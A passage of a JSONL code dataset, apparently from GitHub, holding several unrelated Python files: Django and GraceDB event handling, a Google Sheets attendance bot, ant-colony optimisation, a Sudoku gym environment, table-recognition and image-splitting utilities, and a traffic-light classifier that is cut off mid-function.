table-bordered table-hover')\n    #return HttpResponse(emision)\n    \n    #send the dataframe as json\n    return JsonResponse(registros_df.to_dict(orient='records'),safe=False)","repo_name":"NaranjoJimenezAndres2/Django_DEMO_proyecto","sub_path":"carreraDetalle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21102970460","text":"from django.shortcuts import render, redirect\nfrom django.http import JsonResponse\nfrom django.conf import settings\n\n# Create your views here.\nfrom .forms import GWEventForm\nfrom .models import GWEvent\n\nfrom ligo.gracedb.rest import GraceDb\nfrom sqlalchemy.engine import create_engine\n\nimport pandas\nimport os\n\ndef index(request):\n    form = GWEventForm()\n    return render(request, 'gw-event-form.html', {'form': form})\n\ndef newevent(request):\n    # if this is a POST request we need to process the form data\n    if request.method == 'POST':\n\n        # 
create a form instance and populate it with data from the request:\n        form = GWEventForm(request.POST)\n        # check whether it's valid:\n        if form.is_valid():\n            # This is where waveform generation code will go Chris P\n            # You parse the request as such\n            superevent_id = str(form.cleaned_data['superevent_id'])\n            api = str(form.cleaned_data['api'])\n            client = GraceDb(api)\n            sevent = client.superevent(superevent_id)\n            info = sevent.json()\n            gwevent, created = GWEvent.objects.get_or_create(superevent_id=superevent_id,\n                                                             preferred_event=info['preferred_event'])\n            gevent = client.event(info['preferred_event'])\n            \n            if created:\n                if info['gw_id']:\n                    gwevent.gw_id = info['gw_id']\n                gwevent.save()\n                return render(request, 'success.html', {'message' : \"This event was created\"})\n            else:\n                if not gwevent.posteriors_uploaded:\n                    filenames = client.files(gwevent.preferred_event).json()\n                    # find posterior samples file\n                    post_files = [ifile for ifile in filenames.keys() if 'posterior' in ifile and ',' not in ifile]\n                    if len(post_files) == 0:\n                        return render(request, 'success.html', {'message' : \"No posterior files linked to event\"})\n                    #download files\n                    for ifile in post_files:\n                        r = client.files(gwevent.preferred_event, '{0}'.format(ifile))\n                        filepath = os.path.join(settings.MEDIA_ROOT, 'files', ifile)\n                        outfile = open('{0}'.format(filepath), 'wb')\n                        outfile.write(r.read())\n                        outfile.close()\n                        try:\n                            samples = pandas.read_hdf('{0}'.format(filepath), key='Overall_posterior')\n                        except:\n                            samples = pandas.read_table('{0}'.format(filepath), sep=' ') \n\n                        engine = create_engine(\"\"\"postgresql://{0}:{1}@gwsci.ciera.northwestern.edu:5432/gw_posteriors\"\"\".format(os.environ['GWSCI_USER'], os.environ['GWSCI_PASSWORD']))\n                        samples.to_sql('{0}_{1}'.format(gwevent.superevent_id, ifile.split('.')[0]), engine)\n                        engine.dispose()\n                    gwevent.posteriors_uploaded = True\n                    gwevent.save()\n                if not gwevent.redshift_uploaded:\n                    print(\"Yep this is here\")\n                if not gwevent.skymap_uploaded:\n                    print(\"Yep this is here\")\n                return render(request, 'success.html', {'message' : \"This event was updated\"})\n    else:\n        return render(request, 'gw-event-form.html', {'form': form})\n","repo_name":"CIERA-Northwestern/gwinteract","sub_path":"gwinteract/newevent/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11179164970","text":"import pandas as pd\nfrom slackbot.bot import Bot, respond_to\nimport datetime\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport gspread\nfrom gspread_dataframe import set_with_dataframe\n\n\nclass Auth():\n    # logic for opening the workbook\n    SP_CREDENTIAL_FILE = \"./secrets/attendance.json\"\n    SP_SCOPE = [\n        'https://spreadsheets.google.com/feeds',\n        'https://www.googleapis.com/auth/drive'\n    ]\n    SP_SHEET_KEY = '1AWzy25WkpHFmf83Y15--T-xZdXRFZ2ZALcLEOXGPkvc'\n\n    def __init__(self):\n        credentials = ServiceAccountCredentials.from_json_keyfile_name(self.SP_CREDENTIAL_FILE, self.SP_SCOPE)\n        self.gc = gspread.authorize(credentials)\n        # self.wb = gc.open_by_key(self.SP_SHEET_KEY)\n        # self.sheet_name = sheet_name\n        # self.wks = self.wb.worksheet(sheet_name)\n        # self.df = pd.DataFrame(self.wks.get_all_records())\n\ndef punch_in(date, punch_in_time, sheet_name):\n    auth = Auth()\n    wb = auth.gc.open_by_key(auth.SP_SHEET_KEY)\n    sheet_list = [ws.title for ws in wb.worksheets()]\n    if sheet_name in sheet_list:\n        wks = wb.worksheet(title=sheet_name)\n        df = 
pd.DataFrame(wks.get_all_records())\n        df = df.append({'日付': date, '出勤時刻': punch_in_time, '退勤時刻': '00:00', '働いた時間': '00:00'}, ignore_index=True)\n        set_with_dataframe(wks, df)\n    else:\n        wks = wb.add_worksheet(title=sheet_name, rows=\"100\", cols=\"30\")\n        df = pd.DataFrame(wks.get_all_records())\n        df = df.append({'日付': date, '出勤時刻': punch_in_time, '退勤時刻': '00:00', '働いた時間': '00:00'}, ignore_index=True)\n        set_with_dataframe(wks, df)\n\n    \ndef punch_out(date, punch_out_time, sheet_name):\n    auth = Auth()\n    wb = auth.gc.open_by_key(auth.SP_SHEET_KEY)\n    wks = wb.worksheet(title=sheet_name)\n    cell = wks.find('0:00')\n    # record the clock-out time\n    wks.update_cell(cell.row, cell.col, punch_out_time)\n\n    # compute working_hours\n    df = pd.DataFrame(wks.get_all_records())\n    time1 = df.iloc[-1, 1]\n    time2 = df.iloc[-1, 2]\n    in_time = datetime.datetime.strptime(time1, '%H:%M')\n    out_time = datetime.datetime.strptime(time2, '%H:%M')\n    # date_time = datetime.datetime.strptime(dte, '%H:%M')\n    working_hours = str(out_time - in_time)\n    print(working_hours)\n    # record working_hours\n    wks.update_cell(cell.row, (cell.col + 1), working_hours)\n\n\n","repo_name":"hiro-551010/attendance","sub_path":"gsd.py","file_name":"gsd.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11215929346","text":"import random\nfrom typing import Tuple\n\nfrom optimization.optimization_method import OptimizationMethod\nfrom pmath.graphs.graphs import Graph\nfrom pmath.graphs.graphs import Node\nfrom pmath.rndgen.util import WeightedSelector\n\n\nclass ArtificalAnts_TS(OptimizationMethod):\n    def __init__(self,\n                 graph: Graph,\n                 p=1.0, # pheromone multiplier\n                 d=5, # distance multiplier\n                 pheromone=0.4, # pheromone added per walk for best ant\n                 pheromone_min=0.1, # for worst ant\n                 # distance=1, # this can either be a float or F(value, iter, time)\n                 evaporation: float = 0.75, # this can either be a float or F(value, iter, time)\n                 normalized_time: bool = False, # whether time and iter should be normalized to max\n                 dist_name: str = \"dist\",\n                 gen_count = 100,\n                 pheromone_name: str = \"pheromone\",\n                 ):\n        super().__init__(region=None)\n        self.p = p\n        self.d = d\n        self.graph = graph\n        self.agents = [graph]\n        self.dist_name = dist_name\n        self.pheromone_name = pheromone_name\n        graph[\"line\"] = self.pheromone_name\n        self.evaporation = evaporation\n        self.normalized_time = normalized_time\n        self.pheromone_min = pheromone_min\n        # self.visited_cities = [] # Cities visited by each ant\n        self.ants = []\n        self.gen_count = gen_count\n        self.init_population(gen_count=gen_count)\n        self.selector = WeightedSelector()\n        self.pheromone = pheromone\n        self.handler = None\n\n    def value_iter_time(self, value):\n        iter = self.iteration\n        if self.iteration_limit > 0:\n            iter /= self.iteration_limit\n        time = self.runtime\n        if self.time_limit < float('inf'):\n            time /= self.time_limit\n        return value, iter, time\n\n    def update_graph(self):\n        for node in self.graph.nodes:\n            for edge in node.edges:\n                edge[self.pheromone_name] *= self.evaporation\n\n    def init_population(self, agents=None, gen_count=30):\n        if agents is None:\n            self.ants = [[random.choice(self.graph.nodes), set(), 0, set()] for i in range(gen_count)]\n        else:\n            self.ants = agents\n\n    def edge_weight(self, agent, edge):\n        if edge.second in agent[1]:\n            return 0\n\n        return (edge[self.pheromone_name]) * self.p + (1 - edge[self.dist_name]) * self.d\n\n    def call_methods(self):\n\n        for j in range(len(self.graph.nodes)):\n            for i, ant in 
enumerate(self.ants):\n                ant = ant # type: Tuple[Node, set]\n\n                ant[1].add(ant[0])\n                if len(ant[1]) == len(self.graph.nodes):\n                    continue\n                # print(ant[0])\n                # print(ant[0].edges)\n                edge = self.selector.choose(ant[0].edges, key=lambda cedge: self.edge_weight(ant, cedge))\n                dist = ant[2] + edge[self.dist_name]\n                next_city = edge.second\n                new_set = ant[1]\n                # edge[self.pheromone_name] = min(100, edge[self.pheromone_name] + self.pheromone)\n                edge_set = ant[3]\n                edge_set.add(edge)\n                # if len(ant[1]) == len(self.graph.nodes):\n                # new_set = set()\n\n                new_ant = (next_city, new_set, dist, edge_set)\n                self.ants[i] = new_ant\n\n        self.ants.sort(key=lambda x: x[2])\n\n        for i, ant in enumerate(self.ants):\n            if i == 0:\n                self.graph[\"best\"] = ant[2]\n            i = 1 - (i / len(self.ants))\n            i *= self.pheromone - self.pheromone_min\n            i += self.pheromone_min\n            for edge in ant[3]:\n                edge[self.pheromone_name] += i\n                edge[self.pheromone_name] = min(20, edge[self.pheromone_name])\n                # print(edge[self.pheromone_name])\n        self.update_graph()\n        self.init_population(gen_count=self.gen_count)\n\n","repo_name":"piokra/sturdy-potato","sub_path":"optimization/ants.py","file_name":"ants.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14882076396","text":"from .conv_head import ConvHead\n#from .ctc_head import ctc_head\n\n__all__ = ['build_head']\nsupport_heads = ['ConvHead']\n\n\ndef build_head(head_name, **kwargs):\n    assert head_name in support_heads, f'Invalid head {head_name}. Supported heads are {support_heads}'\n    head = eval(head_name)(**kwargs)\n    return head\n","repo_name":"SamitHuang/mindocr_test","sub_path":"mindocr/models/heads/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9425026789","text":"import gym\nfrom gym import spaces\nimport numpy as np\nimport sys\n\n\nresolved = 0\nunfinished = 1\nerror = 2\n\n\n# Check a solution is correct by checking the 3 constraints on all digits\n#\t- digit is unique in row\n#\t- digit is unique in column\n#\t- digit is unique in square\n# @return\n#\t- resolved if the grid is resolved\n#\t- unfinished if the grid is not yet finished\n#\t- error if one of the constraints is not respected\ndef checkSolution(grid):\n\tN = len(grid)\n\n\tfor i in range(N):\n\t\tfor j in range(N):\n\t\t\t# If a cell is not filled, the sudoku is not finished\n\t\t\tif grid[i][j] == 0:\n\t\t\t\treturn unfinished\n\n\t\t\tn = N/3\n\t\t\tiOffset = i/n*n\n\t\t\tjOffset = j/n*n\n\t\t\tsquare = grid[ iOffset:iOffset + n , jOffset:jOffset + n].flatten()\n\t\t\t# Check uniqueness\n\t\t\tuniqueInRow = countItem(grid[i], grid[i, j]) == 1\n\t\t\tuniqueInCol = countItem(grid[:,j:j+1].flatten(), grid[i, j]) == 1\n\t\t\tuniqueInSquare = countItem(square, grid[i, j]) == 1\n\n\t\t\tif not (uniqueInRow and uniqueInCol and uniqueInSquare):\n\t\t\t\treturn error\n\n\treturn resolved\n\n\n# Count the number of times the item appears in a vector\ndef countItem(vector, item):\n\tcount = 0\n\tfor item2 in vector:\n\t\tif item2 == item: count += 1\n\treturn count\n\n\n# Recursively find all solutions (backtracking)\n# @param stopAt make the backtracking stop when it has found x solutions\n# @param i, j force to start the backtracking from the cell (i, j)\n# @param omit prevent looking into a possibility\ndef getSolutions(grid, stopAt=1, i=-1, j=-1, omit=-1):\n\tN = len(grid)\n\tcheck = 
\t# Check if grid is resolved or if there is an error\n\tif check == resolved:\n\t\treturn np.array([grid], dtype=int)\n\tif check == error:\n\t\treturn np.empty(shape=(0,N,N), dtype=int)\n\n\t# If i and j are not set, get the first empty spot and start backtracking from it\n\tif i == -1:\n\t\tfor i in range(N):\n\t\t\tfor j in range(N):\n\t\t\t\t# Stop at the first empty spot\n\t\t\t\tif grid[i, j] == 0: break\n\t\t\tif grid[i, j] == 0: break\n\n\t# Randomize possible values\n\tvalues = np.arange(1, N+1)\n\tnp.random.shuffle(values)\n\t# Try all possibilities from those values until we reach the max nb of solutions asked by stopAt\n\tsolutions = np.empty(shape=(0,N,N), dtype=int)\n\tfor value in values:\n\t\tif omit == value: continue\n\t\tcGrid = np.copy(grid)\n\t\tcGrid[i, j] = value\n\t\tsubSolutions = getSolutions(cGrid, stopAt=stopAt-len(solutions))\n\t\tsolutions = np.concatenate((solutions, subSolutions))\n\t\tif len(solutions) >= stopAt:\n\t\t\treturn solutions\n\treturn solutions\n\n\nclass SudokuEnv(gym.Env):\n\tmetadata = {'render.modes': ['human']}\n\tlast_action = None\n\n\t# Make a random grid and store it in self.base\n\tdef __init__(self):\n\t\t# The box space is continuous. This doesn't apply to a sudoku grid, but there is no other choice\n\t\tself.observation_space = spaces.Box(low=1, high=9, shape=(9, 9))\n\t\tself.action_space = spaces.Tuple((spaces.Discrete(9), spaces.Discrete(9), spaces.Discrete(9)))\n\t\t# Get a random solution for an empty grid\n\t\tself.grid = []\n\t\tself.base = getSolutions(np.zeros(shape=(9,9)))[0]\n\t\t# Get all positions in random order, to randomly parse the grid\n\t\tN = len(self.base)\n\t\tpositions = []\n\t\tfor i in range(N):\n\t\t\tfor j in range(N):\n\t\t\t\tpositions.append((i, j))\n\t\tnp.random.shuffle(positions)\n\n\t\tcount = 0\n\t\t# Try to put 0 instead of the original value for all positions\n\t\t# Stop after 40 --> medium difficulty\n\t\t# This is slow after 40 because the algorithm looks for 1 solution when there is none,\n\t\t# so it really checks all the possibilities...\n\t\tfor i, j in positions:\n\t\t\tif count > 40:\n\t\t\t\tbreak\n\t\t\toldValue = self.base[i, j]\n\t\t\tself.base[i, j] = 0\n\t\t\tsolutions = getSolutions(self.base, stopAt=2, i=i, j=j, omit=oldValue)\n\t\t\tif len(solutions) == 0:\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\t# if more than one solution undo\n\t\t\t\tself.base[i, j] = oldValue\n\n\n\t# @return\n\t# \t- a copy of the grid to prevent alteration from the user\n\t# \t- a reward: - negative if action leads to an error\n\t#\t            - positive if action is correct or grid is resolved\n\tdef step(self, action):\n\t\tself.last_action = action\n\t\toldGrid = np.copy(self.grid)\n\n\t\t# The user can't replace a value that was already set\n\t\tif self.grid[action[0], action[1]] != 0:\n\t\t\treturn np.copy(self.grid), -1, False, None\n\n\t\t# We add one to the action because the action space is from 0-8 and we want a value in 1-9\n\t\tself.grid[action[0], action[1]] = action[2]+1\n\n\t\tstats = checkSolution(self.grid)\n\t\t# If grid is complete or correct, return positive reward\n\t\tif stats == resolved:\n\t\t\treturn np.copy(self.grid), 1, True, None\n\t\telif stats == unfinished:\n\t\t\treturn np.copy(self.grid), 1, False, None\n\t\tif stats == error:\n\t\t\t# If move is wrong, return to old state, and return negative reward\n\t\t\tself.grid = oldGrid\n\t\t\treturn np.copy(self.grid), -1, False, None\n\n
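\t# Note on the reward scheme above (added): any consistent placement earns +1,\n\t# even while the grid is unfinished, so the positive signal is dense; overwriting\n\t# a given cell or breaking a constraint costs -1 and leaves the grid unchanged.\n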
\n\t# Replace self.grid with self.base\n\t# Creating a new grid at every reset would be expensive\n\tdef reset(self):\n\t\tself.last_action = None\n\t\tself.grid = np.copy(self.base)\n\t\treturn np.copy(self.grid)\n\n\n\tdef render(self, mode='human', close=False):\n\n\t\tfor i in range(len(self.grid)):\n\t\t\tfor j in range(len(self.grid)):\n\t\t\t\tif self.last_action is not None and i == self.last_action[0] and j == self.last_action[1]:\n\t\t\t\t\t# step() stores action[2]+1 in the grid, so compare and display the shifted digit\n\t\t\t\t\tif self.last_action[2] + 1 == self.grid[i, j]:\n\t\t\t\t\t\tsys.stdout.write('\\033[92m' + str(self.last_action[2] + 1) + '\\033[0m')\n\t\t\t\t\telse:\n\t\t\t\t\t\tsys.stdout.write('\\033[91m' + str(self.last_action[2] + 1) + '\\033[0m')\n\t\t\t\telse:\n\t\t\t\t\tsys.stdout.write(str(self.grid[i, j]))\n\t\t\t\tif j % 3 == 2 and j != len(self.grid)-1:\n\t\t\t\t\tsys.stdout.write(' | ')\n\t\t\tif i % 3 == 2 and i != len(self.grid)-1:\n\t\t\t\tsys.stdout.write('\\n---------------\\n')\n\t\t\telse:\n\t\t\t\tsys.stdout.write('\\n')\n\t\tsys.stdout.write('\\n\\n')\n\t\tsys.stdout.flush()\n\n\n# env = SudokuEnv()\n# env._reset()\n# print env.grid\n\n# grid = np.array(\n# [[0,0,0,4,0,9,0,0,1],\n# [0,0,4,0,3,0,0,2,0],\n# [0,7,2,0,5,1,0,0,6],\n# [4,2,1,0,0,5,6,0,0],\n# [8,0,0,0,0,2,0,0,0],\n# [3,0,0,9,0,0,0,0,0],\n# [0,1,0,5,7,4,0,0,0],\n# [5,0,6,0,0,3,0,0,7],\n# [0,0,3,0,9,0,0,1,0]])\n#\n# print getSolutions(grid)\n","repo_name":"artonge/gym-sudoku","sub_path":"gym_sudoku/envs/sudoku_env.py","file_name":"sudoku_env.py","file_ext":"py","file_size_in_byte":5938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5227962296","text":"import torch\nfrom torch.utils.data import Dataset\nimport albumentations as A\nimport jsonlines\nimport cv2\nfrom copy import copy\nimport numpy as np\nfrom utils.utils import load_elements\n\n\nclass PubTabNetLabelEncode:\n    def __init__(\n        self,\n        elem_dict_path,\n    ):\n        self.elements = load_elements(elem_dict_path)\n        self.dict_elem = {}\n        for i, elem in enumerate(self.elements):\n            self.dict_elem[elem] = i\n\n    def index_encode(self, seq):\n        _seq = ['sos'] + seq + ['eos']\n        result = [self.dict_elem[elem.strip()] for elem in _seq]\n        return result\n\n    def get_bbox_for_each_tag(self, data, pad_value):\n        bboxs = data['bboxs']\n        tag_idxs = data['tag_idxs']\n\n        td_idx = self.dict_elem['</td>']\n        bbox_idx = 0\n        result = []\n        # np.bool was removed from NumPy; the builtin bool is the correct dtype\n        mask = np.zeros(len(tag_idxs), dtype=bool)\n        for i, tag_idx in enumerate(tag_idxs):\n            if (tag_idx == td_idx) and (bbox_idx < len(bboxs)):\n                bbox = copy(bboxs[bbox_idx])\n                if bbox[0] >= bbox[2]:\n                    bbox[2] = bbox[0]+1\n                if bbox[1] >= bbox[3]:\n                    bbox[3] = bbox[1]+1\n                result.append(bbox)\n                bbox_idx += 1\n                mask[i] = True\n            else:\n                result.append(copy(pad_value))\n        return np.asarray(result), mask\n\n    def one_hot(self, inputs):\n        inputs = np.asarray(inputs)\n        mask = np.zeros((inputs.size, inputs.max()+1))\n        mask[np.arange(inputs.size), inputs] = 1\n        return mask \n\n    def __call__(self, data):\n        pad_value = [0., 0., 1., 1.]\n        \n        data['tag_idxs'] = self.index_encode(data['tokens'])\n        data['tag_bboxs'], data['bbox_mask'] = self.get_bbox_for_each_tag(data, pad_value)\n\n        data['tag_idxs'] = self.one_hot(data['tag_idxs'])\n        return data\n\n\nclass PubTabNet(Dataset):\n    def __init__(self,\n                 annotation_file,\n                 img_dir,\n                 transform=None,\n                 target_transform=None,\n                 elem_dict_path='./utils/dict/table_elements.txt',\n                 ):\n        super().__init__()\n        with jsonlines.open(annotation_file, 'r') as reader:\n            self.labels = list(reader)\n        self.img_dir = img_dir\n        self.transform = self.init_transform(transform, 256, 512)\n        self.target_transform = target_transform\n        
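# Note (added): the encoder below turns the raw 'tokens' and cell 'bboxs' into\n        # one-hot tag targets plus one box per '</td>' tag (see PubTabNetLabelEncode above).\n        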
self.label_encode = PubTabNetLabelEncode(elem_dict_path)\n\n @staticmethod\n def init_transform(transform_list, pad=256, resize=256):\n result = [\n # A.PadIfNeeded(pad, pad, border_mode=cv2.BORDER_CONSTANT, value=(255, 255, 255), position='top_left'),\n A.Resize(resize, resize),\n ]\n\n p = 0.05\n additional_transforms = [\n A.InvertImg(p=p),\n A.GaussianBlur(p=p),\n A.RandomToneCurve(p=p),\n A.ChannelShuffle(p=p),\n A.Solarize(p=p),\n A.ColorJitter(p=p),\n A.MedianBlur(p=p),\n # A.RandomShadow(p=p),\n A.RandomSunFlare(p=p, src_radius=40),\n ]\n\n if transform_list is not None:\n result += transform_list\n# result += additional_transforms\n\n result = A.Compose(\n result,\n bbox_params=A.BboxParams(format='pascal_voc', label_fields=['category_ids'])\n )\n return result\n \n def __getitem__(self, item):\n data = self.labels[item]\n filename = data['filename']\n image = self.read_image(filename)\n tokens = data['html']['structure']['tokens'].copy()\n bboxs = [c['bbox'] for c in data['html']['cells']]\n \n result = {\n 'image': image,\n 'tokens': tokens,\n 'bboxs': bboxs,\n }\n result = self.label_encode(result)\n category_ids = np.zeros(len(result['tag_bboxs']))\n\n transformed = self.transform(image=result['image'], bboxes=result['tag_bboxs'], category_ids=category_ids)\n result['image'] = torch.tensor(np.rollaxis(transformed['image'], 2, 0)/255)\n\n result['tag_bboxs'] = torch.tensor(transformed['bboxes'])\n result['tag_idxs'] = torch.tensor(result['tag_idxs'])\n result = self.normalize_bbox_coord(result)\n \n return result['image'].float(), (result['tag_idxs'].float(), result['tag_bboxs'].float())\n \n def prep_image(self, image):\n bboxs = np.asarray([[0, 0, 1, 1]])\n category_ids = np.zeros(len(bboxs))\n \n transformed = self.transform(image=image, bboxes=bboxs, category_ids=category_ids)\n image = torch.tensor(np.rollaxis(transformed['image'], 2, 0)/255)\n return image.float()\n\n def __len__(self):\n return len(self.labels)\n\n def read_image(self, img_name):\n image = cv2.imread(self.img_dir + img_name)\n return image\n\n @staticmethod\n def normalize_bbox_coord(data):\n data['tag_bboxs'][~data['bbox_mask']] = 0.0\n data['tag_bboxs'][:, [0, 2]] /= data['image'].shape[1]\n data['tag_bboxs'][:, [1, 3]] /= data['image'].shape[2]\n return data\n\n\nclass PubTabNetLabelDecode:\n def __init__(\n self,\n elem_dict_path,\n ):\n self.elements = load_elements(elem_dict_path)\n self.dict_elem = {}\n for i, elem in enumerate(self.elements):\n self.dict_elem[elem] = i\n\n def postprocess(self, struct, bboxs, h, w):\n struct = np.asarray(struct).argmax(axis=1).tolist()\n bboxs = bboxs.tolist()\n\n result_bbox = []\n result_struct = []\n result_struct_bbox = []\n\n for tag_idx, bbox in zip(struct, bboxs):\n x0, y0, x1, y1 = bbox\n x0, y0, x1, y1 = x0 * w, y0 * h, x1 * w, y1 * h\n bbox = [x0, y0, x1, y1]\n \n tag = self.elements[tag_idx]\n bbox_tag = self.elements[tag_idx]\n \n if tag == '</td>':\n bbox_tag = str(bbox) + tag\n result_bbox.append(bbox)\n if tag == 'sos':\n continue\n if tag == 'eos':\n break\n \n result_struct.append(tag)\n result_struct_bbox.append(bbox_tag)\n return result_struct, result_bbox, result_struct_bbox\n\n def __call__(self, image_batch, struct_batch, bbox_batch):\n result_struct = []\n result_bbox = []\n result_struct_bbox = []\n\n for img, struct, bbox in zip(image_batch, struct_batch, bbox_batch):\n height, width = img.shape[:2]\n struct, bbox, struct_bbox = self.postprocess(struct, bbox, height, width)\n struct_bbox = ''.join(struct_bbox)\n 
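# Note (added): each '</td>' cell contributed '[x0, y0, x1, y1]</td>' in\n            # postprocess above, so the joined string is the HTML structure with boxes inlined.\n            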
result_struct.append(struct)\n result_bbox.append(bbox)\n result_struct_bbox.append(struct_bbox)\n return result_struct, result_bbox, result_struct_bbox\n","repo_name":"Nazar96/TableEDD","sub_path":"data/pubtabnet.py","file_name":"pubtabnet.py","file_ext":"py","file_size_in_byte":6899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9667113341","text":"from osgeo import gdal\r\nimport os\r\nimport json\r\nfrom tqdm import tqdm\r\nimport argparse\r\n\r\ndef write_json_dict(save_path, load_dict):\r\n with open(save_path, \"w\") as f:\r\n json.dump(load_dict, f)\r\n\r\ndef split(label_path, image_path, count, block=512):\r\n result_dict = {}\r\n data = gdal.Open(label_path)\r\n width = data.RasterXSize\r\n height = data.RasterYSize\r\n for x in range(0, width, block):\r\n if width < block:\r\n block_x = width\r\n else:\r\n block_x = width - x if block > width - x else block\r\n for y in range(0, height, block):\r\n if height < block:\r\n block_y = height\r\n else:\r\n block_y = height - y if block > height - y else block\r\n result_dict[str(count)] = {\r\n 'imagePath': image_path,\r\n 'labelPath': label_path,\r\n 'x': x,\r\n 'y': y,\r\n 'block_x': block_x,\r\n 'block_y': block_y,\r\n 'width': width,\r\n 'height': height\r\n }\r\n count += 1\r\n return result_dict, count\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--image_root', default='./GID/Large-scale-Classification_5classes/image_RGB/')\r\n parser.add_argument('--label_root', default='./GID/Large-scale-Classification_5classes/label_5classes/')\r\n args = parser.parse_args()\r\n\r\n image_list = os.listdir(args.image_root)\r\n image_list_train = image_list[0:120]\r\n image_list_test = image_list[120:len(image_list)]\r\n\r\n count = 0\r\n result_all_train = {}\r\n for imagename in tqdm(image_list_train):\r\n if imagename[-4:] == '.tif':\r\n image_path = os.path.join(args.image_root, imagename)\r\n label_path = os.path.join(args.label_root, imagename.replace('.tif', '_label.tif'))\r\n assert os.path.exists(image_path)\r\n assert os.path.exists(label_path)\r\n result_dict, count = split(label_path, image_path, count, block=512)\r\n result_all_train.update(result_dict)\r\n write_json_dict('LCC5C_b512_woOverlap.json', result_all_train)\r\n\r\n count = 0\r\n result_all_test = {}\r\n for imagename in tqdm(image_list_test):\r\n if imagename[-4:] == '.tif':\r\n image_path = os.path.join(args.image_root, imagename)\r\n label_path = os.path.join(args.label_root, imagename.replace('.tif', '_label.tif'))\r\n assert os.path.exists(image_path)\r\n assert os.path.exists(label_path)\r\n result_dict, count = split(label_path, image_path, count, block=512)\r\n result_all_test.update(result_dict)\r\n write_json_dict('LCC5C_b512_woOverlap_test.json', result_all_test)\r\n","repo_name":"WHULuoJiaTeam/Model_Zoo","sub_path":"Semantic_Segmentation/UNet/GID/Ascend/1chip/code/train_test_split.py","file_name":"train_test_split.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"36702541475","text":"import cv2\nimport numpy as np\nimport tensorflow as tf\nfrom styx_msgs.msg import TrafficLight\n\n\nEPS = np.finfo('float32').eps\n\n\nclass TrafficLightClassifier:\n\n # Pretrained weights location\n checkpoint_path = './light_classification/pretrained_weights/mixed/TLC.ckpt'\n\n def __init__(self, input_shape, learning_rate):\n\n # Placeholders\n 
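# Note (added): this is TF1-style graph construction; the placeholders below are\n        # bound to concrete batches via feed_dict when the session runs.\n        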
self.input_h, self.input_w = input_shape\n        self.x = tf.placeholder(dtype=tf.float32, shape=[None, self.input_h, self.input_w, 3])  # input placeholder\n        self.targets = tf.placeholder(dtype=tf.int32, shape=[None])\n        self.keep_prob = tf.placeholder(dtype=tf.float32)  # dropout keep probability\n\n        self.n_classes = 4  # {void, red, yellow, green}\n        self.learning_rate = learning_rate  # learning rate used in train step\n\n        self._inference = None\n        self._loss = None\n        self._train_step = None\n        self._accuracy = None\n        self._summaries = None\n\n        # Touching the properties here builds the whole graph up front\n        self.inference\n        self.loss\n        self.train_step\n        self.accuracy\n        # self.summaries  # todo add these\n\n    @property\n    def inference(self):\n        if self._inference is None:\n            with tf.variable_scope('inference'):\n\n                kernel_regularizer = tf.contrib.layers.l2_regularizer(1e-3)\n                conv1_filters = 32\n                conv1 = tf.layers.conv2d(self.x, conv1_filters, kernel_size=(3, 3), padding='same',\n                                         activation=tf.nn.relu, kernel_regularizer=kernel_regularizer)\n                pool1 = tf.layers.max_pooling2d(conv1, pool_size=(2, 2), strides=(2, 2), padding='same')\n\n                conv2_filters = 64\n                conv2 = tf.layers.conv2d(pool1, conv2_filters, kernel_size=(3, 3), padding='same',\n                                         activation=tf.nn.relu, kernel_regularizer=kernel_regularizer)\n                pool2 = tf.layers.max_pooling2d(conv2, pool_size=(2, 2), strides=(2, 2), padding='same')\n\n                _, h, w, c = pool2.get_shape().as_list()\n                pool2_flat = tf.reshape(pool2, shape=[-1, h * w * c])\n\n                pool2_drop = tf.nn.dropout(pool2_flat, keep_prob=self.keep_prob)\n\n                hidden_units = self.n_classes\n                hidden = tf.layers.dense(pool2_drop, units=hidden_units, activation=tf.nn.relu)\n\n                logits = tf.layers.dense(hidden, units=self.n_classes, activation=None)\n\n                self._inference = tf.nn.softmax(logits)\n\n        return self._inference\n\n    @property\n    def loss(self):\n        if self._loss is None:\n            with tf.variable_scope('loss'):\n                predictions = self.inference\n                targets_onehot = tf.one_hot(self.targets, depth=self.n_classes)\n                self._loss = tf.reduce_mean(-tf.reduce_sum(targets_onehot * tf.log(predictions + EPS), reduction_indices=1))\n        return self._loss\n\n    @property\n    def train_step(self):\n        if self._train_step is None:\n            with tf.variable_scope('training'):\n                self._train_step = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss)\n        return self._train_step\n\n    @property\n    def accuracy(self):\n        if self._accuracy is None:\n            with tf.variable_scope('accuracy'):\n                correct_predictions = tf.equal(tf.argmax(self.inference, axis=1),\n                                               tf.argmax(tf.one_hot(self.targets, depth=self.n_classes), axis=1))\n                self._accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32))\n        return self._accuracy\n\n    def get_classification(self, sess, image):\n\n        # Resize captured image to match input size\n        image = cv2.resize(image, (self.input_w, self.input_h))\n\n        # Preprocess image to be approximately in range [-1, 1]\n        x = np.float32(image) - np.mean(image)\n        x /= x.max()\n        x = np.expand_dims(x, 0)  # add dummy batch dimension\n\n        # Predict\n        pred = sess.run(self.inference, feed_dict={self.x: x, self.keep_prob: 1.})\n        pred_idx = int(np.argmax(pred))  # index of the most probable class (batch size is 1)\n\n        labels = ['NO SEMAPHORE', 'RED', 'YELLOW', 